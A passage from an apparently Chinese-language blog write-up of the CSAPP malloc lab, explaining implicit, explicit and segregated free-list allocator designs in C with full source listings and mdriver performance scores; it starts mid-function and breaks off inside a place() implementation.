bp = PREV_BLKP(bp);
}
else
{
size += GET_SIZE(HDRP(PREV_BLKP(bp))) +
GET_SIZE(FTRP(NEXT_BLKP(bp)));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}
return bp;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/

void *mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char* bp;

if (size <= 0)
return NULL;
if (size <= DSIZE)
asize = 2 * DSIZE;
else
asize = DSIZE * ((size + DSIZE + (DSIZE - 1)) / DSIZE);
if ((bp = find_fit(asize)) != NULL)
{
place(bp, asize);
pre_listp = bp;
return bp;
}
extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / WSIZE)) == NULL)
return NULL;
place(bp, asize);
pre_listp = bp;
return bp;
}

/*
* mm_free - Freeing a block does nothing.
*/

void mm_free(void* bp)
{
size_t size = GET_SIZE(HDRP(bp));

PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
pre_listp = coalesce(bp);
return;
}

static void* find_fit(size_t asize)
{
char* bp = pre_listp;
size_t alloc;
size_t size;
while (GET_SIZE(HDRP(NEXT_BLKP(bp))) > 0) {
bp = NEXT_BLKP(bp);
alloc = GET_ALLOC(HDRP(bp));
if (alloc) continue;
size = GET_SIZE(HDRP(bp));
if (size < asize) continue;
return bp;
}
bp = heap_listp;
while (bp != pre_listp) {
bp = NEXT_BLKP(bp);
alloc = GET_ALLOC(HDRP(bp));
if (alloc) continue;
size = GET_SIZE(HDRP(bp));
if (size < asize) continue;
return bp;
}
return NULL;
}
static void place(void* bp, size_t asize)
{
size_t size = GET_SIZE(HDRP(bp));

if ((size - asize) >= (2 * DSIZE))
{
PUT(HDRP(bp), PACK(asize, 1));
PUT(FTRP(bp), PACK(asize, 1));
PUT(HDRP(NEXT_BLKP(bp)), PACK(size - asize, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size - asize, 0));
}
else
{
PUT(HDRP(bp), PACK(size, 1));
PUT(FTRP(bp), PACK(size, 1));
}
return;
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/

void* mm_realloc(void* ptr, size_t size)
{
size_t oldsize = GET_SIZE(HDRP(ptr));
void* newptr = mm_malloc(size);
if (!newptr)
return 0;
pre_listp = newptr;
if (!ptr)
return newptr;
memcpy(newptr, ptr, (size < oldsize ? size : oldsize));
mm_free(ptr);
return newptr;
}

显式空间链表+首次适配+LIFO队列

上两次试验采用了隐式空间链表,这次尝试一些显示空间链表

显示空间链表需要把空闲块链接到一起,所以需要一个宏定义来指向下一个空闲块

1
#define NEXT_RP(bp)  ((unsigned int)(bp)+WSIZE) /*指向下一空闲块指针*/

显示空间链表采用双向链表,至少需要16字节,在空闲块中:

  • BP 指向(前驱):上一个空闲块
  • BP+4 指向(后继):下一个空闲块

另外还需要两个含函数来进行“插入”和“脱链”操作:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
inline void __insert(char *bp)
{
char *next = GET(root); /* 读取4字节的内容,转化为指针(数据可以随便转指针) */
if(next != NULL) // 如果是root的第一个chunk,那么"next==NULL"
PUT(next, bp);
PUT(NEXT_RP(bp), next);
PUT(root,bp);
}

inline void __remove(char *bp){
char *pre = GET((bp)); /* 读取前4字节(指向前一个chunk) */
char *next = GET(NEXT_RP(bp)); /* 读取后4字节(指向后一个chunk) */
if(pre == NULL){
if(next != NULL)
PUT(next,0); /* 前无后有 */
PUT(root,next); /* 前无后无 */
}
else{
if(next != NULL)
PUT((next),pre); /* 前有后有 */
PUT(NEXT_RP(pre),next); /* 前有后无 */
}
PUT(NEXT_RP(bp),0);
PUT(bp,0);
}

在显式空间链表采用专门的链表来管理空闲块,这里采用后入先出队列

插入的逻辑:把root当成第一个空闲块,以后的空闲块都插入root的前驱(先写旧空闲块的后驱,再写新内存块的前驱)

脱链的逻辑:分为4种情况

  • 前有后有:中间某个 chunk,修改 nextchunk->last 为 lastchunk,修改 lastchunk->next 为 nextchunk,置空 chunk
  • 前有后无:root 的最后一个chunk,置空 lastchunk->next,置空 chunk
  • 前无后有:root 的第一个chunk,置空 nextchunk->last,修改 root 为 nextchunk,置空 chunk
  • 前无后无:root 的第一个并且是唯一一个chunk,直接置空 root,置空 chunk

下面是root依次插入 A,B,C,D 时的反应:(经典插头)

1
2
3
4
5
root(NULL)
root(A) => A(/NULL)
root(B) => B(/A) => A(B/NULL)
root(C) => C(/B) => B(C/A) => A(B/NULL)
root(D) => D(/C) => C(D/B) => B(C/A) => A(B/NULL)

下面是root分别释放 A,B,C,D 时的反应:

1
2
3
4
A: root(D) => D(/C) => C(D/B) => B(C/NULL)
B: root(D) => D(/C) => C(D/A) => A(C/NULL)
C: root(D) => D(/B) => B(D/A) => A(B/NULL)
D: root(C) => C(/B) => B(C/A) => A(B/NULL)

初始化函数发生了变化:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
int mm_init(void){
if((heap_listp = mem_sbrk(6*WSIZE))==(void *)-1)
return -1;
PUT(heap_listp,0);
PUT(heap_listp+(1*WSIZE),0); // 初始化前驱
PUT(heap_listp+(2*WSIZE),0); // 初始化后继
PUT(heap_listp+(3*WSIZE),PACK(DSIZE,1)); // 初始化头(12~16)
PUT(heap_listp+(4*WSIZE),PACK(DSIZE,1)); // 初始化脚(16~20)
PUT(heap_listp+(5*WSIZE),PACK(0,1)); // 初始化下一个头部(20~~24)
root = heap_listp + (1*WSIZE); // 初始化根节点
heap_listp += (4*WSIZE);
if((extend_heap(CHUNKSIZE/DSIZE)) == NULL)
return -1;
return 0;
}

根节点就是第一次内存块的前驱(在root用完之前都是不变的)

合并模块对空闲块的管理更为复杂了:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
static void *coalesce(void *bp)
{
size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));

/*coalesce the block and change the point*/
if(prev_alloc && !next_alloc){
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
__remove(NEXT_BLKP(bp)); /*使用了这个块,切记移除它*/
PUT(HDRP(bp), PACK(size,0));
PUT(FTRP(bp), PACK(size,0));
}
else if(!prev_alloc && next_alloc){
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
__remove(PREV_BLKP(bp));/*使用了这个块,切记移除它*/
PUT(FTRP(bp),PACK(size,0));
PUT(HDRP(PREV_BLKP(bp)),PACK(size,0));
bp = PREV_BLKP(bp);
}
else if (!prev_alloc && !next_alloc){
size +=GET_SIZE(FTRP(NEXT_BLKP(bp)))+ GET_SIZE(HDRP(PREV_BLKP(bp)));
__remove(PREV_BLKP(bp));/*使用了这个块,切记移除它*/
__remove(NEXT_BLKP(bp));/*使用了这个块,切记移除它*/
PUT(FTRP(NEXT_BLKP(bp)),PACK(size,0));
PUT(HDRP(PREV_BLKP(bp)),PACK(size,0));
bp = PREV_BLKP(bp);
}
__insert(bp);/*新的空闲块,记住插入*/
return bp;
}

只要空闲块发生过合并,就会被“remove”移出链表,在最后“insert”插入链表最前端

现在查找模块只需要在空闲块链表中查询就行了:(从头开始寻找)

1
2
3
4
5
6
7
8
9
10
static void *find_fit(size_t size){
/*first fit*/
char *bp = GET(root); /* 获取空闲链表头 */
while(bp != NULL){
if(GET_SIZE(HDRP(bp)) >= size)
return bp;
bp = GET(NEXT_RP(bp));
}
return NULL;
}

先获取链表最前端的空闲块,依次向后索引

放置模块需要多考虑前驱和后继的初始化:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
static void place(void *bp,size_t asize)
{
size_t csize = GET_SIZE(HDRP(bp));
__remove(bp); /*使用了这个块,切记移除它*/
if(csize-asize >= 2 *DSIZE){
PUT(HDRP(bp),PACK(asize,1));
PUT(FTRP(bp),PACK(asize,1));
PUT(HDRP(NEXT_BLKP(bp)),PACK(csize-asize,0));
PUT(FTRP(NEXT_BLKP(bp)),PACK(csize-asize,0));
PUT(NEXT_RP(bp),0);
PUT((NEXT_BLKP(bp)),0);
coalesce(NEXT_BLKP(bp));
}
else{
PUT(HDRP(bp),PACK(csize,1));
PUT(FTRP(bp),PACK(csize,1));
}
}

其他模块和书上的代码差不多,需要注意一下:何时该“插入”,何时该“脱链”

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* 显式空间链表+LIFO队列+首次适配 */
➜ [/home/ywhkkx/malloclab-handout] ./mdriver -v
Team Name:ateam
Member 1 :Harry Bovik:bovik@cs.cmu.edu
Using default tracefiles in /home/ywhkkx/malloclab-handout/traces/
Measuring performance with gettimeofday().

Results for mm malloc:
trace valid util ops secs Kops
0 yes 89% 5694 0.000167 34157
1 yes 92% 5848 0.000093 62747
2 yes 94% 6648 0.000327 20355
3 yes 96% 5380 0.000195 27661
4 yes 99% 14400 0.000093155005
5 yes 88% 4800 0.000390 12301
6 yes 85% 4800 0.000413 11625
7 yes 55% 12000 0.001840 6522
8 yes 51% 24000 0.001684 14249
9 yes 26% 14401 0.041531 347
10 yes 34% 14401 0.001982 7266
Total 74% 112372 0.048714 2307

Perf index = 44 (util) + 40 (thru) = 84/100
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)

#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

#define WSIZE 4
#define DSIZE 8
#define CHUNKSIZE (1<<12)
#define MAX(x,y) ((x) > (y)? (x) : (y))
#define PACK(size,alloc) ((size) | (alloc))
#define GET(p) (*(unsigned int *)(p))
#define PUT(p,val) (*(unsigned int *)(p) = (val))
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)
#define HDRP(bp) ((char *)(bp) - WSIZE)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)
#define NEXT_BLKP(bp) ((char*)(bp) + GET_SIZE(((char *)(bp) - WSIZE)))
#define PREV_BLKP(bp) ((char*)(bp) - GET_SIZE(((char *)(bp) - DSIZE)))
#define NEXT_RP(bp) ((unsigned int)(bp)+WSIZE)

int mm_check(char* function);
static void* extend_heap(size_t words);
static void* coalesce(void* bp);
static void* find_fit(size_t asize);
static void place(void* bp, size_t asize);
void __insert(char* p);
void __remove(char* p);

static char* heap_listp = NULL;
static char* root = NULL;

/*
* mm_init - initialize the malloc package.
*/

int mm_init(void)
{
if ((heap_listp = mem_sbrk(6 * WSIZE)) == (void*)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + (1 * WSIZE), 0);
PUT(heap_listp + (2 * WSIZE), 0);
PUT(heap_listp + (3 * WSIZE), PACK(DSIZE, 1));
PUT(heap_listp + (4 * WSIZE), PACK(DSIZE, 1));
PUT(heap_listp + (5 * WSIZE), PACK(0, 1));
root = heap_listp + (1 * WSIZE);
heap_listp += (4 * WSIZE);
if ((extend_heap(CHUNKSIZE / DSIZE)) == NULL)
return -1;
return 0;
}

static void* extend_heap(size_t words)
{
char* bp;
size_t size;

size = (words % 2) ? (words + 1) * DSIZE : words * DSIZE;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 1));
PUT(NEXT_RP(bp), 0);
PUT(bp, 0);
return coalesce(bp);
}

static void* coalesce(void* bp)
{
size_t prev_alloc = GET_ALLOC(FTRP(PREV_BLKP(bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));
if (prev_alloc && !next_alloc)
{
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
__remove(NEXT_BLKP(bp));
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
}
else if (!prev_alloc && next_alloc)
{
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
__remove(PREV_BLKP(bp));
PUT(FTRP(bp), PACK(size, 0));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}
else if(!prev_alloc && !next_alloc)
{
size += GET_SIZE(HDRP(PREV_BLKP(bp))) +
GET_SIZE(FTRP(NEXT_BLKP(bp)));
__remove(PREV_BLKP(bp));
__remove(NEXT_BLKP(bp));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 0));
bp = PREV_BLKP(bp);
}
__insert(bp);
return bp;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/

void *mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char* bp;

if (size <= 0)
return NULL;
if (size <= DSIZE)
asize = 2 * DSIZE;
else
asize = DSIZE * ((size + DSIZE + (DSIZE - 1)) / DSIZE);
if ((bp = find_fit(asize)) != NULL)
{
place(bp, asize);
return bp;
}
extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / DSIZE)) == NULL)
return NULL;
place(bp, asize);
return bp;
}

/*
* mm_free - Freeing a block does nothing.
*/

void mm_free(void* bp)
{
if (bp == NULL)
return;
size_t size = GET_SIZE(HDRP(bp));
PUT(HDRP(bp), PACK(size, 0));
PUT(FTRP(bp), PACK(size, 0));
PUT(NEXT_RP(bp), 0);
PUT(bp, 0);
coalesce(bp);
}

static void* find_fit(size_t size)
{
char* bp = GET(root);
while (bp != NULL)
{
if (GET_SIZE(HDRP(bp)) >= size)
return bp;
bp = GET(NEXT_RP(bp));
}
return NULL;
}

static void place(void* bp, size_t asize)
{
size_t size = GET_SIZE(HDRP(bp));
__remove(bp);
if ((size - asize) >= (2 * DSIZE))
{
PUT(HDRP(bp), PACK(asize, 1));
PUT(FTRP(bp), PACK(asize, 1));
PUT(HDRP(NEXT_BLKP(bp)), PACK(size - asize, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size - asize, 0));
PUT(NEXT_RP(bp), 0);
PUT((NEXT_BLKP(bp)), 0);
coalesce(NEXT_BLKP(bp));
}
else
{
PUT(HDRP(bp), PACK(size, 1));
PUT(FTRP(bp), PACK(size, 1));
}
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/

void* mm_realloc(void* ptr, size_t size) {

void* newptr = mm_malloc(size);
if (!newptr) {
return 0;
}
if (ptr == NULL) {
return newptr;
}

size_t oldsize = GET_SIZE(HDRP(ptr));
memcpy(newptr, ptr, oldsize < size ? oldsize : size);
mm_free(ptr);

return newptr;
}

inline void __insert(char* bp)
{
char* next = GET(root);
if (next != NULL)
PUT(next, bp);
PUT(NEXT_RP(bp), next);
PUT(root, bp);
}

inline void __remove(char* bp)
{
char* pre = GET((bp));
char* next = GET(NEXT_RP(bp));
if (pre == NULL)
{
if (next != NULL)
PUT(next, 0);
PUT(root, next);
}
else
{
if (next != NULL)
PUT((next), pre);
PUT(NEXT_RP(pre), next);
}
PUT(NEXT_RP(bp), 0);
PUT(bp, 0);
}

隐式空闲链表+下次适配+增添标记位

和第二次试验很相似,只不过需要去除ALLOC内存块的脚部,并在一些位置进行修改

开始实验之前先进行一下思考:假设ALLOC内存块没有脚部

1
#define PREV_BLKP(bp) ((char *)(bp) - GET_SIZE(((char *)(bp) - DSIZE)))

那么,宏定义“PREV_BLKP(bp)”将会失效,ALLOC内存块将不能获取它前面的内存块,回看第二次实验的代码,发现就只有合并模块会受到影响:刚刚被free的ALLOC内存块不清楚上一个内存块是否为ALLOC

解决办法:对标记位进行操作,使头部可以表示上一个内存块的状态

分配的内存块大小为8的倍数,最后3位数值恒定,理论上有3个标志位可以用,以上代码中,最后一个标志位被用于记录“当前内存块是否为ALLOC”,与之类似,我们可以使用倒数第二个标志位来记录“上一个内存块是否为ALLOC”

1
2
3
#define PREALLOC(x) ((!x) ? 0 : 2) // 根据"x"中是否有数据来获取"0 & 2"
#define PACK(size, prealloc, alloc) ((size) | (PREALLOC(prealloc)) | (alloc))
#define GET_PREALLOC(p) (GET(p) & 0x2) // 获取倒数第二个标志位

这些宏定义可以简化我们的操作

1
2
3
4
5
6
inline void set_next_prealloc(void* bp, size_t prealloc)
{
size_t size = GET_SIZE(HDRP(NEXT_BLKP(bp))); // 获取下一个内存块的size
size_t alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp))); // 获取下一个内存块的alloc
PUT(HDRP(NEXT_BLKP(bp)), PACK(size,prealloc,alloc));
}

这个函数可以根据当前内存块的状态,来更新下一个内存块的头部

接下来的代码和第二次实验区别不大,但需要注意一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
void* mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char* bp;

if (size <= 0)
return NULL;
if (size <= WSIZE)
// if (size <= DSIZE)
asize = DSIZE;
// asize = 2 * DSIZE;
else
asize = DSIZE * ((size + WSIZE + (DSIZE - 1)) / DSIZE);
// asize = DSIZE * ((size + DSIZE + (DSIZE - 1)) / DSIZE);
if ((bp = find_fit(asize)) != NULL)
{
place(bp, asize);
return bp;
}
extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / WSIZE)) == NULL)
return NULL;
place(bp, asize);
return bp;
}

“mm_malloc”获取ALLOC内存块时,不用写入脚部,可以少申请4字节,最小字节数可以变为“8”

打分&完整代码:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
/* 隐式空闲链表+下次适配 */
➜ [/home/ywhkkx/malloclab-handout] ./mdriver -v
Team Name:ateam
Member 1 :Harry Bovik:bovik@cs.cmu.edu
Using default tracefiles in /home/ywhkkx/malloclab-handout/traces/
Measuring performance with gettimeofday().

Results for mm malloc:
trace valid util ops secs Kops
0 yes 89% 5694 0.002184 2607
1 yes 92% 5848 0.001025 5704
2 yes 95% 6648 0.003881 1713
3 yes 97% 5380 0.002774 1939
4 yes 66% 14400 0.000101142292
5 yes 92% 4800 0.004425 1085
6 yes 91% 4800 0.003771 1273
7 yes 55% 12000 0.007433 1614
8 yes 51% 24000 0.007050 3404
9 yes 27% 14401 0.042339 340
10 yes 30% 14401 0.001879 7663
Total 71% 112372 0.076863 1462

Perf index = 43 (util) + 40 (thru) = 83/100
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
#include <stdio.h>
#include <stdlib.h>
#include <assert.h>
#include <unistd.h>
#include <string.h>

#include "mm.h"
#include "memlib.h"

/* single word (4) or double word (8) alignment */
#define ALIGNMENT 8

/* rounds up to the nearest multiple of ALIGNMENT */
#define ALIGN(size) (((size) + (ALIGNMENT-1)) & ~0x7)

#define SIZE_T_SIZE (ALIGN(sizeof(size_t)))

#define WSIZE 4
#define DSIZE 8
#define CHUNKSIZE (1<<12)
#define MAX(x,y) ((x) > (y)? (x) : (y))
#define PREALLOC(x) ((!x) ? 0 : 2)
#define PACK(size,prealloc,alloc) ((size) | (PREALLOC(prealloc)) | (alloc))
#define GET(p) (*(unsigned int *)(p))
#define PUT(p,val) (*(unsigned int *)(p) = (val))
#define GET_SIZE(p) (GET(p) & ~0x7)
#define GET_ALLOC(p) (GET(p) & 0x1)
#define GET_PREALLOC(p) (GET(p) & 0x2)
#define HDRP(bp) ((char *)(bp) - WSIZE)
#define FTRP(bp) ((char *)(bp) + GET_SIZE(HDRP(bp)) - DSIZE)
#define NEXT_BLKP(bp) ((char*)(bp) + GET_SIZE(((char *)(bp) - WSIZE)))
#define PREV_BLKP(bp) ((char*)(bp) - GET_SIZE(((char *)(bp) - DSIZE)))

static void* extend_heap(size_t words);
static void* coalesce(void* bp);
static void* find_fit(size_t asize);
static void place(void* bp, size_t asize);
inline void set_next_prealloc(void* bp, size_t prealloc);

static char* heap_listp;
static char* pre_listp;

/*
* mm_init - initialize the malloc package.
*/

int mm_init(void)
{
if ((heap_listp = mem_sbrk(4 * WSIZE)) == (void*)-1)
return -1;
PUT(heap_listp, 0);
PUT(heap_listp + (1 * WSIZE), PACK(DSIZE, 1, 1));
PUT(heap_listp + (2 * WSIZE), PACK(DSIZE, 1, 1));
PUT(heap_listp + (3 * WSIZE), PACK(0, 1, 1));
heap_listp += (2 * WSIZE);
pre_listp = heap_listp;
if (extend_heap(CHUNKSIZE / WSIZE) == NULL)
return -1;
return 0;
}

static void* extend_heap(size_t words)
{
char* bp;
size_t size, prealloc;

size = (words % 2) ? (words + 1) * WSIZE : words * WSIZE;
if ((long)(bp = mem_sbrk(size)) == -1)
return NULL;
prealloc = GET_PREALLOC(HDRP(bp));
PUT(HDRP(bp), PACK(size, prealloc, 0));
PUT(FTRP(bp), PACK(size, prealloc, 0));
PUT(HDRP(NEXT_BLKP(bp)), PACK(0, 0, 1));
return coalesce(bp);
}

static void* coalesce(void* bp)
{
size_t prev_alloc = GET_PREALLOC(HDRP((bp)));
size_t next_alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
size_t size = GET_SIZE(HDRP(bp));
if (prev_alloc && next_alloc)
{
set_next_prealloc(bp, 0);
pre_listp = bp;
return bp;
}
if (prev_alloc && !next_alloc)
{
size += GET_SIZE(HDRP(NEXT_BLKP(bp)));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 1, 0));
PUT(HDRP(bp), PACK(size, 1, 0));
}
else if (!prev_alloc && next_alloc)
{
size += GET_SIZE(HDRP(PREV_BLKP(bp)));
PUT(FTRP(bp), PACK(size, 1, 0));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 1, 0));
bp = PREV_BLKP(bp);
}
else
{
size += GET_SIZE(HDRP(PREV_BLKP(bp))) +
GET_SIZE(FTRP(NEXT_BLKP(bp)));
PUT(HDRP(PREV_BLKP(bp)), PACK(size, 1, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size, 1, 0));
bp = PREV_BLKP(bp);
}
set_next_prealloc(bp, 0);
pre_listp = bp;
return bp;
}

/*
* mm_malloc - Allocate a block by incrementing the brk pointer.
* Always allocate a block whose size is a multiple of the alignment.
*/

void* mm_malloc(size_t size)
{
size_t asize;
size_t extendsize;
char* bp;

if (size <= 0)
return NULL;
if (size <= WSIZE)
asize = DSIZE;
else
asize = DSIZE * ((size + WSIZE + (DSIZE - 1)) / DSIZE);
if ((bp = find_fit(asize)) != NULL)
{
place(bp, asize);
pre_listp = bp;
return bp;
}
extendsize = MAX(asize, CHUNKSIZE);
if ((bp = extend_heap(extendsize / WSIZE)) == NULL)
return NULL;
place(bp, asize);
pre_listp = bp;
return bp;
}

/*
* mm_free - Freeing a block does nothing.
*/

void mm_free(void* bp)
{
size_t size = GET_SIZE(HDRP(bp));
size_t prealloc = GET_PREALLOC(HDRP(bp));
PUT(HDRP(bp), PACK(size, prealloc, 0));
PUT(FTRP(bp), PACK(size, prealloc, 0));
coalesce(bp);
return;
}

static void* find_fit(size_t asize)
{
char* bp = pre_listp;
size_t alloc;
size_t size;
while (GET_SIZE(HDRP(NEXT_BLKP(bp))) > 0) {
bp = NEXT_BLKP(bp);
alloc = GET_ALLOC(HDRP(bp));
if (alloc) continue;
size = GET_SIZE(HDRP(bp));
if (size < asize) continue;
return bp;
}
bp = heap_listp;
while (bp != pre_listp) {
bp = NEXT_BLKP(bp);
alloc = GET_ALLOC(HDRP(bp));
if (alloc) continue;
size = GET_SIZE(HDRP(bp));
if (size < asize) continue;
return bp;
}
return NULL;
}
static void place(void* bp, size_t asize)
{
size_t size = GET_SIZE(HDRP(bp));

if ((size - asize) >= DSIZE)
{
PUT(HDRP(bp), PACK(asize, 1, 1));
PUT(FTRP(bp), PACK(asize, 1, 1));
PUT(HDRP(NEXT_BLKP(bp)), PACK(size - asize, 1, 0));
PUT(FTRP(NEXT_BLKP(bp)), PACK(size - asize, 1, 0));
set_next_prealloc(bp, 0);
}
else
{
PUT(HDRP(bp), PACK(size, 1, 1));
set_next_prealloc(bp, 1);
}
pre_listp = bp;
}

/*
* mm_realloc - Implemented simply in terms of mm_malloc and mm_free
*/

void* mm_realloc(void* ptr, size_t size)
{
size_t oldsize = GET_SIZE(HDRP(ptr));
void* newptr = mm_malloc(size);
if (!newptr)
return 0;
pre_listp = newptr;
if (!ptr)
return newptr;
memcpy(newptr, ptr, (size < oldsize ? size : oldsize));
mm_free(ptr);
return newptr;
}

inline void set_next_prealloc(void* bp, size_t prealloc)
{
size_t size = GET_SIZE(HDRP(NEXT_BLKP(bp)));
size_t alloc = GET_ALLOC(HDRP(NEXT_BLKP(bp)));
PUT(HDRP(NEXT_BLKP(bp)), PACK(size, prealloc, alloc));
}

分离式空闲链表+首次适配

分离式空闲链表(Segregated Free Lists),采用了 分离存储 技术,同时维护多个空闲链表,其中每个链表中的块有大致相等的大小

实现 分离存储 有许多中方法,CSAPP简单提及了三种:

  • 简单分离存储
  • 分离适配
  • 伙伴系统

这里采用 简单分离存储 的方式实现分离式空闲链表,同一区域的空闲块用前驱和后继指针进行连接

多了两个宏定义:

1
2
#define PREV_LINKNODE_RP(bp) ((char*)(bp))
#define NEXT_LINKNODE_RP(bp) ((char*)(bp)+WSIZE)
  • PREV_LINKNODE_RP(bp):获取上一个空闲块
  • NEXT_LINKNODE_RP(bp):获取下一个空闲块
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
int mm_init(void)
{
if((heap_listp = mem_sbrk(14*WSIZE))==(void *)-1)
return -1;
PUT(heap_listp,0); /*block size list<=8*/
PUT(heap_listp+(1*WSIZE),0); /*block size list<=16*/
PUT(heap_listp+(2*WSIZE),0); /*block size list<=32*/
PUT(heap_listp+(3*WSIZE),0); /*block size list<=64*/
PUT(heap_listp+(4*WSIZE),0); /*block size list<=128*/
PUT(heap_listp+(5*WSIZE),0); /*block size list<=256*/
PUT(heap_listp+(6*WSIZE),0); /*block size list<=512*/
PUT(heap_listp+(7*WSIZE),0); /*block size list<=2048*/
PUT(heap_listp+(8*WSIZE),0); /*block size list<=4096*/
PUT(heap_listp+(9*WSIZE),0); /*block size list>4096*/
PUT(heap_listp+(10*WSIZE),0);
PUT(heap_listp+(11*WSIZE),PACK(DSIZE,1)); // 初始化头部
PUT(heap_listp+(12*WSIZE),PACK(DSIZE,1)); // 初始化脚部
PUT(heap_listp+(13*WSIZE),PACK(0,1)); // 初始化下一个内存块的头部

block_list_start = heap_listp;
heap_listp += (12*WSIZE);

if((extend_heap(CHUNKSIZE/DSIZE))==NULL)
return -1;
return 0;
}

在初始的第一个内存块的前面:定义了若干个分离的空间链表

“extend_heap”,“mm_malloc”和第三次实验(显示空间链表)的差别不大

“find_fit”和“place”需要重写(首次适配):

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
static void *find_fit(size_t size)
{
/*first fit*/
char *root = find_list_root(size); // 根据size获取相应的空间链表
for(root; root!=(heap_listp-(2*WSIZE)); root+=WSIZE)
{ /* root+WSIZE:指向有更大空闲块的空闲链表 */
char *tmpP = GET(root); // 获取当前空间链表中最前面的内存块
while(tmpP != NULL)
{ /* 遍历当前空间链表:从前往后 */
if(GET_SIZE(HDRP(tmpP))>=size)
return tmpP;
tmpP = GET(NEXT_LINKNODE_RP(tmpP));
}
}
return NULL;
}

static void place(void *bp,size_t asize)
{
size_t csize = GET_SIZE(HDRP(bp));
fix_linklist(bp); /* 脱链 */
